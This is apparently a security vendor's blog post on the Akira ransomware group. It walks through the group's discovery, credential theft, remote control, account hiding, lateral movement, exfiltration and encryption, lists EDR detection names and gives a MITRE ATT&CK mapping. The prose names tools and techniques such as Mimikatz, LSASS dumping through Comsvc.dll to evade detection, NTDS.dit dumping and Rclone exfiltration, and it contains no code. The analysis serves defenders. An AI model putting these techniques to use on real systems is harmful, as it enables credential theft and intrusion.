Detecting Akira Ransomware Attack Using AhnLab EDR
Akira is a relatively new ransomware threat actor that has been active since March 2023. Like other ransomware threat actors, they breach organizations and not only encrypt their files but also exfiltrate sensitive information to use in negotiations. As shown in the following 2024 statistics, the number of companies affected by Akira ransomware is still high. [1]
Figure 1. Number of Organizations Hit by Ransomware Attacks in 2024
The threat actor guides victims to Akira TOR website for ransom negotiation after encrypting the organization’s system with ransomware. If the attackers’ demands are not met, they threaten to release sensitive data. Victims affected by the attack are continuously listed on the TOR site operated by the threat actor.
Figure 2. Akira ransomware’s TOR site
It is known that the threat actor’s initial access to the target system involved exploiting VPN accounts without multi-factor authentication (MFA) or attacking various vulnerabilities. Notable vulnerabilities include Fortinet’s CVE-2019-6693, CVE-2022-40684, and CVE-2023-48788, as well as Cisco’s CVE-2020-3259 and CVE-2023-20269. The threat actor also attacked SonicWall’s vulnerability (CVE-2024-40766). During the attack, the Akira ransomware threat actor also exploited the vulnerability of Veeam Backup & Replication server (CVE-2024-40711) and VMware ESXi (CVE-2024-37085) for privilege escalation.
This post will introduce the known attack methods of the Akira ransomware threat actor and the attack techniques discovered as the threat actor gains control over the victim organizations after the initial breach. [2] [3] [4] [5] It will also cover how these attack techniques can be detected using AhnLab EDR.
AhnLab EDR (Endpoint Detection and Response) is a next-generation endpoint threat detection and response solution that provides powerful threat monitoring, analysis, and response capabilities. AhnLab EDR continuously collects information on suspicious behaviors by type, allowing users to accurately perceive threats from detection, analysis, and response perspectives. This enables comprehensive analysis for identifying causes, implementing appropriate responses, and establishing prevention processes.
Figure 3. AhnLab EDR
1. Discovery
Threat actors can use port scanning to obtain information about the currently activated systems and ports in a specific network, i.e., the services that are currently running. They use this network exploration process to check the network structure, including subnet and host information. The Akira ransomware threat actors are known to use tools like Advanced IP Scanner or NetScan in the network information collection process.
Afterward, they use Active Directory in victim environments to collect information about domain trusts and domain controllers. Threat actors may utilize the Windows built-in tool, Nltest, or install a popular tool called AdFind. Threat actors utilize the results of AdFind to understand the structure of the domain environment and identify targets for their lateral movement attacks.
Finally, the use of BloodHound is also known. BloodHound is a tool that collects information related to the active directory domain to find attack paths for privilege escalation. It provides a GUI-based tool that shows the results in a graph. It visualizes the minimum path for threat actors to obtain domain administrator privileges within the domain in a graph format.
Figure 4. EDR detection on the behaviors of the threat actor in the Discovery phase
2. Credential Access
If the victim organization’s infrastructure uses Active Directory, threat actors can go through the above Discovery phase to collect information on the domain environment and steal credentials. They can use this information to laterally move through the network and ultimately take control of the domain environment.
Akira ransomware threat actors are known to exploit Mimikatz or Comsvc.dll for these purposes. Mimikatz is a program that can extract credential information in a Windows operating system environment. It supports a method of extracting the NT Hash (a hash used in the NTLM authentication protocol) stored in the memory of the LSASS process.
However, this memory dumping behavior is considered suspicious by security solutions, and suspicious tools like Mimikatz are key detection targets for security products. There is a method to bypass the security detection by exploiting Comsvc.dll. This involves using the MiniDump function of the Comsvc.dll that is installed by default in the Windows environment to create a memory dump for the LSASS process.
In addition, they also exploit the open-source hacking tool LaZagne, which is a credential extraction tool that extracts credential information stored in the system. For example, it can dump the Security Accounts Manager (SAM) database where the user’s credential information is stored, and this can be used in side movement attacks. Furthermore, in AD servers, the “ntdsutil.exe” tool is used to dump the NTDS.dit file, which contains important information such as user accounts, groups, and policies in the Active Directory environment.
Aside from credentials stored in the operating system, credential information stored in web browsers is also a target for exfiltration. Threat actors use WebBrowserPassView, a tool developed by NirSoft, or exploit “esentutl.exe” to copy the data file that contains the credential information in the Chrome web browser.
Figure 5. EDR detection of threat actor’s behavior during the Credential Access phase
3. Command and Control
During the stage of controlling the infected system, remote management tools such as AnyDesk, RustDesk, and Radmin are usually installed. These remote management tools are often used for legitimate purposes of remote control and management, making it difficult for antivirus solutions to detect and block them. AhnLab EDR collects relevant information on the behavior of users who use remote management tools for legitimate remote control purposes, allowing administrators to be aware of suspicious behaviors and respond to them.
Threat actors not only communicate directly with the C&C server but also install proxy tools. This is mainly used to expose infected systems that cannot be accessed from the outside, such as systems located within a NAT environment. The Akira ransomware threat actor is also known to have used Ngrok or Cloudflare’s tunneling tool (Cloudflare Tunnel) in their attacks.
Figure 6. EDR detection of threat actor’s behaviors in the Command and Control phase
4. Persistence / Defense Evasion
The Akira ransomware threat actor maintains persistence by adding a new account to control the infected system. However, the added account is displayed at logon, allowing the system user to become aware of the new account. To prevent this, the threat actor registers the created account in SpecialAccounts to hide it at logon.
Figure 7. EDR detection of account hiding behavior
5. Lateral Movement
Threat actors can laterally move within the organization’s internal network using the credentials collected during the Credential Access phase. In the case of the Akira ransomware threat actor, they utilized the credentials to gain control over the systems, by using RDP or executing commands with PsExec and wmiexec tool in Impacket.
Figure 8. EDR detection on behaviors of the threat actor in the Lateral Movement phase
6. Collection / Exfiltration
The Akira ransomware threat actor, like other ransomware threat actors, encrypts the systems of organizations and blackmails them by threatening to leak the stolen data. Threat actors collect and compress sensitive information from hijacked systems, and then steal this data.
There are many tools to compress files and folders, but the Akira ransomware threat actor is known to mainly use WinRAR. The threat actor then steals the compressed files via the FTP protocol or a cloud storage service. For the FTP protocol, WinSCP and FileZilla were used. Mega, a cloud storage service, was exploited, or the Rclone tool was used.
Rclone is a program that supports file transfer features for various cloud storage services. It supports most operating systems, including Windows, Linux, and macOS, and most cloud services, such as Dropbox, Google Drive, Microsoft OneDrive, and MEGA.
Figure 9. EDR detection on threat actor’s behaviors during information theft
7. Impact
Akira ransomware encrypts user files and appends the “.akira” extension. It also creates a ransom note named “akira_readme.txt”. The note includes an Onion address and a code for the victim to use in the chat login.
Figure 10. EDR detection of Akira ransomware
8. Conclusion
The Akira ransomware threat actor has been actively operating since March 2023 to the present day, January 2025. They attack known vulnerabilities or exploit stolen accounts to infiltrate organizations, gain control of their internal networks, collect sensitive information, and ultimately encrypt the systems, using them as leverage in negotiations to generate profits.
AhnLab EDR detects the threats posed by the attack techniques of the Akira ransomware threat actor, as well as the behavior of the ransomware, allowing administrators to identify the causes and establish appropriate responses and prevention processes. It also provides information on suspicious behavior, such as the installation and execution of suspicious tools within the organization, as a key behavior, allowing administrators to be aware of and respond to such behavior.
Behavior Detection
– Execution/EDR.SharpHound.M11547
– LateralMovement/EDR.ADFind.M10710
– Infostealer/DETECT.Nltest.M10657
– Execution/EDR.AdvancedScanner.M12194
– Execution/EDR.Behavior.M10482
– CredentialAccess/EDR.Mimikatz.M11444
– CredentialAccess/EDR.Comsvc.M11596
– CredentialAccess/MDP.Dump.M11773
– CredentialAccess/EDR.NTDSUtil.M12395
– Execution/EDR.Event.M10819
– CredentialAccess/EDR.Password.M12276
– Execution/DETECT.AnyDesk.M11495
– Execution/DETECT.RustDesk.M12042
– Execution/DETECT.Radmin.M12410
– Execution/EDR.Ngrok.11445
– Execution/EDR.Proxy.M12411
– Suspicious/DETECT.MT1136.M2445
– Persistence/EDR.HideAccount.M11388
– LateralMovement/EDR.PSExec.M10481
– LateralMovement/EDR.Impacket.M12414
– Infostealer/DETECT.WinRAR.M12364
– Execution/DETECT.WinSCP.M11619
– Execution/DETECT.FileZilla.M11618
– Infostealer/EDR.Rclone.M11475
– Ransom/EDR.Decoy.M2470
| Tactic | Technique |
|---|---|
| Discovery (TA0007) | Remote System Discovery (T1018) System Owner/User Discovery (T1033) Network Service Discovery (T1046) Permission Groups Discovery: Local Groups (T1069.001) Permission Groups Discovery: Domain Groups (T1069.002) Account Discovery: Local Account (T1087.002) Account Discovery: Domain Account (T1087.002) Domain Trust Discovery (T1482) Group Policy Discovery (T1615) |
| Credential Access (TA0006) | OS Credential Dumping: LSASS Memory (T1003.001) OS Credential Dumping: Security Account Manager (T1003.002) OS Credential Dumping: NTDS (T1003.003) Credentials from Password Stores: Credentials from Web Browsers (1555.003) |
| Command and Control (TA0011) | Remote Access Software (T1219) Proxy (T1090) Protocol Tunneling (T1572) |
| Persistence (TA0003) | Create Account (T1136) |
| Defense Evasion (TA0005) | Hide Artifacts: Hidden Users (T1564.002) |
| Lateral Movement (TA0008) | Lateral Tool Transfer (T1570) Remote Services: SMB/Windows Admin Shares (T1021.002) |
| Collection (TA0009) | Archive Collected Data: Archive via Utility (T1560.001) |
| Exfiltration (TA0010) | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003) Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002) |
| Impact (TA0040) | Financial Theft (T1657) Data Encrypted for Impact (T1486) |
MITRE ATT&CK Mapping Information
